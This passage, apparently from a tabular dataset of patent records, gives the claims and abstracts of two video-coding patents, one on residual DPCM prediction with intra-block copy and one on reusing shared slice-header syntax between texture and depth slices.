encode data that represents the predicted residual block in a bitstream. 39. The device of claim 38, wherein to generate the predicted residual block, the video encoder is configured to apply residual differential pulse code modulation (RDPCM) to the residual block. 40. The device of claim 39, wherein to apply the RDPCM to the residual block, the video encoder is configured to apply horizontal RDPCM to the one or more residual values. 41. The device of claim 39, wherein to apply the RDPCM to the predicted residual block, the video encoder is configured to apply vertical RDPCM to the one or more residual values. 42. The device of claim 39, wherein to apply the RDPCM, the video encoder is configured to select an RDPCM mode from a plurality of RDPCM modes and to apply the selected RDPCM mode, the video encoder is further configured to encode data that indicates the selected RDPCM mode. 43. The device of claim 42, wherein to encode the data that indicates the selected RDPCM mode, the video encoder is configured to encode data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 44. The device of claim 38, wherein to generate the residual block, the video encoder is configured to apply an intra-block copying (intra-BC) process to generate the residual block, wherein to apply the intra-BC process, the video encoder is configured to determine a region of the picture from which to select the prediction block and to determine a displacement vector that identifies the prediction block, and wherein the video encoder is further configured to encode data that represents the displacement vector. 45. The device of claim 38, wherein to encode the data, the video encoder is configured to apply quantization to the predicted residual block in a lossy encoding process. 46. The device of claim 38, wherein to encode the data, the video encoder is configured to encode the data without applying quantization to the predicted residual in a lossless encoding process. 47. The device of claim 38, wherein the video encoder is further configured to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block. 48. The device of claim 47, wherein to encode the one or more syntax elements, the video encoder is configured to encode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 49. The device of claim 47, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 50. The device of claim 38, further comprising a camera sensor configured to generate the current block. 51. A device for decoding video data, the device comprising:
means for generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and means for generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 52. The device of claim 51, further comprising means for decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 53. A device for encoding video data, the device comprising:
means for generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; means for generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and means for encoding data that represents the predicted residual block in a bitstream. 54. The device of claim 53, further comprising means for encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 55. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 56. The non-transitory computer-readable medium of claim 55, wherein the instructions further cause the one or more processors to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 57. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encode data that represents the predicted residual block in a bitstream. 58. The non-transitory computer-readable medium of claim 57, wherein the instructions further cause the one or more processors to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. | In an example, a method of decoding video data includes generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block. The method also includes generating a current block of the picture based on a combination of the residual block and a prediction block of the picture.1. A method of decoding video data, the method comprising:
generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 2. The method of claim 1, further comprising obtaining the predicted residual block from an encoded bitstream, and wherein generating the residual block comprises applying residual differential pulse code modulation (RDPCM) to the predicted residual block. 3. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying horizontal RDPCM to the one or more predicted residual values. 4. The method of claim 2, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more predicted residual values. 5. The method of claim 2, wherein applying the RDPCM comprises obtaining, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 6. The method of claim 5, wherein obtaining the data that indicates an RDPCM mode comprises obtaining data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 7. The method of claim 1, further comprising:
obtaining, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locating the prediction block of the picture using the displacement vector. 8. The method of claim 1, wherein generating the residual block further comprises applying inverse quantization to the residual block in a lossy decoding process. 9. The method of claim 1, wherein generating the residual block comprises generating the residual block without performing inverse quantization in a lossless decoding process. 10. The method of claim 1, further comprising decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the residual block of the picture based on the predicted residual block. 11. The method of claim 10, wherein decoding the one or more syntax elements comprises decoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 12. The method of claim 10, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 13. A method of encoding video data, the method comprising:
generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encoding data that represents the predicted residual block in a bitstream. 14. The method of claim 13, wherein generating the predicted residual block comprises applying residual differential pulse code modulation (RDPCM) to the residual block. 15. The method of claim 14, wherein applying the RDPCM to the residual block comprises applying horizontal RDPCM to the one or more residual values. 16. The method of claim 14, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more residual values. 17. The method of claim 14, wherein applying the RDPCM comprises selecting an RDPCM mode from a plurality of RDPCM modes and applying the selected RDPCM mode, the method further comprising encoding data that indicates the selected RDPCM mode. 18. The method of claim 17, wherein encoding data that indicates the selected RDPCM mode comprises encoding data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 19. The method of claim 13, wherein generating the residual block comprises applying an intra-block copying (intra-BC) process to generate the residual block, wherein applying the intra-BC process comprises determining a region of the picture from which to select the prediction block, and determining a displacement vector that identifies the prediction block, the method further comprising encoding data that represents the displacement vector. 20. The method of claim 13, wherein encoding the data comprises applying quantization to the predicted residual block in a lossy encoding process. 21. The method of claim 13, wherein encoding the data comprises encoding the data without applying quantization to the predicted residual in a lossless encoding process. 22. The method of claim 13, further comprising encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the predicted residual block. 23. The method of claim 22, wherein encoding the one or more syntax elements comprises encoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 24. The method of claim 22, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 25. A device for of decoding video data, the device comprising:
a memory configured to store the video data; and a video decoder configured to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and
generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 26. The device of claim 25, wherein the video decoder is further configured to obtain the predicted residual block from an encoded bitstream, and wherein to generate the residual block, the video decoder is configured to apply residual differential pulse code modulation (RDPCM) to the predicted residual block. 27. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply horizontal RDPCM to the one or more predicted residual values. 28. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply vertical RDPCM to the one or more predicted residual values. 29. The device of claim 26, wherein to apply the RDPCM, the video decoder is configured to obtain, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 30. The device of claim 29, wherein to obtain the data that indicates an RDPCM mode, the video decoder is configured to obtain data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 31. The device of claim 25, wherein the video decoder is further configured to:
obtain, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locate the prediction block of the picture using the displacement vector. 32. The device of claim 25, wherein to generate the residual block, the video decoder is configured to apply inverse quantization to the residual block in a lossy decoding process. 33. The device of claim 25, wherein to generate the residual block, the video decoder is configured to generate the residual block without performing inverse quantization in a lossless decoding process. 34. The device of claim 25, wherein the video decoder is further configured to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block. 35. The device of claim 34, wherein to decode the one or more syntax elements, the video decoder is configured to decode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 36. The device of claim 34, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 37. The device of claim 25, further comprising a display configured to display the current block of the picture. 38. A device for encoding video data, the device comprising:
a memory configured to store the video data; a video encoder configured to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture;
generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and
encode data that represents the predicted residual block in a bitstream. 39. The device of claim 38, wherein to generate the predicted residual block, the video encoder is configured to apply residual differential pulse code modulation (RDPCM) to the residual block. 40. The device of claim 39, wherein to apply the RDPCM to the residual block, the video encoder is configured to apply horizontal RDPCM to the one or more residual values. 41. The device of claim 39, wherein to apply the RDPCM to the predicted residual block, the video encoder is configured to apply vertical RDPCM to the one or more residual values. 42. The device of claim 39, wherein to apply the RDPCM, the video encoder is configured to select an RDPCM mode from a plurality of RDPCM modes and to apply the selected RDPCM mode, the video encoder is further configured to encode data that indicates the selected RDPCM mode. 43. The device of claim 42, wherein to encode the data that indicates the selected RDPCM mode, the video encoder is configured to encode data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 44. The device of claim 38, wherein to generate the residual block, the video encoder is configured to apply an intra-block copying (intra-BC) process to generate the residual block, wherein to apply the intra-BC process, the video encoder is configured to determine a region of the picture from which to select the prediction block and to determine a displacement vector that identifies the prediction block, and wherein the video encoder is further configured to encode data that represents the displacement vector. 45. The device of claim 38, wherein to encode the data, the video encoder is configured to apply quantization to the predicted residual block in a lossy encoding process. 46. The device of claim 38, wherein to encode the data, the video encoder is configured to encode the data without applying quantization to the predicted residual in a lossless encoding process. 47. The device of claim 38, wherein the video encoder is further configured to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block. 48. The device of claim 47, wherein to encode the one or more syntax elements, the video encoder is configured to encode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 49. The device of claim 47, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 50. The device of claim 38, further comprising a camera sensor configured to generate the current block. 51. A device for decoding video data, the device comprising:
means for generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and means for generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 52. The device of claim 51, further comprising means for decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 53. A device for encoding video data, the device comprising:
means for generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; means for generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and means for encoding data that represents the predicted residual block in a bitstream. 54. The device of claim 53, further comprising means for encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 55. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 56. The non-transitory computer-readable medium of claim 55, wherein the instructions further cause the one or more processors to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 57. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encode data that represents the predicted residual block in a bitstream. 58. The non-transitory computer-readable medium of claim 57, wherein the instructions further cause the one or more processors to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. | 2,400 |
9,104 | 9,104 | 13,553,617 | 2,483 | In one example, a video coder is configured to code a first slice, wherein the first slice comprises one of a texture slice and a corresponding depth slice, wherein the first slice has a slice header comprising complete syntax elements representative of characteristics of the first slice. The video coder is further configured to determine common syntax elements for a second slice from the slice header of the first slice. The video coder is also configured to code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. | 1. A method of processing video data, the method comprising:
receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and decoding the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 2. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 3. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 4. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 5. The method of claim 1, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 6. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 7. The method of claim 1, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 8. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 9. The method of claim 1, further comprising:
signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 10. A device for decoding data, comprising a video decoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 11. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 12. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 13. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 14. The device of claim 10, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 15. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 16. The device of claim 10, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, wherein the video decoder is further configured to determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 17. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 18. The device of claim 10, wherein the video coder is further configured to signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 19. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video decoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 20. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 21. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 22. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 23. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 24. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 25. The computer-readable storage medium of claim 19, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the instructions further cause a processor of a video decoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 26. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for decoding the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 27. The device of claim 26, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 28. A method of encoding video data, the method comprising:
receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 29. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 30. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 31. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 32. The method of claim 28, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 33. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 34. The method of claim 28, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 35. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 36. The method of claim 28, further comprising:
signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 37. A device for encoding data, comprising a video encoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, encode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and encode the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 38. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 39. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 40. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 41. The device of claim 37, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 42. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 43. The device of claim 37, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, and wherein the video encoder is further configured to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 44. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 45. The device of claim 37, wherein the video encoder is further configured to:
signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 46. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video encoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; code a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 47. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 48. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 49. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 50. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 51. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 52. The computer-readable storage medium of claim 46, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the instructions further cause a processor of a video encoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 53. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, without repeating values for syntax elements that are common to the first slice. 54. The device of claim 53, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. | In one example, a video coder is configured to code a first slice, wherein the first slice comprises one of a texture slice and a corresponding depth slice, wherein the first slice has a slice header comprising complete syntax elements representative of characteristics of the first slice. The video coder is further configured to determine common syntax elements for a second slice from the slice header of the first slice. The video coder is also configured to code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice.1. A method of processing video data, the method comprising:
receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and decoding the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 2. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 3. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 4. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 5. The method of claim 1, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 6. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 7. The method of claim 1, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 8. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 9. The method of claim 1, further comprising:
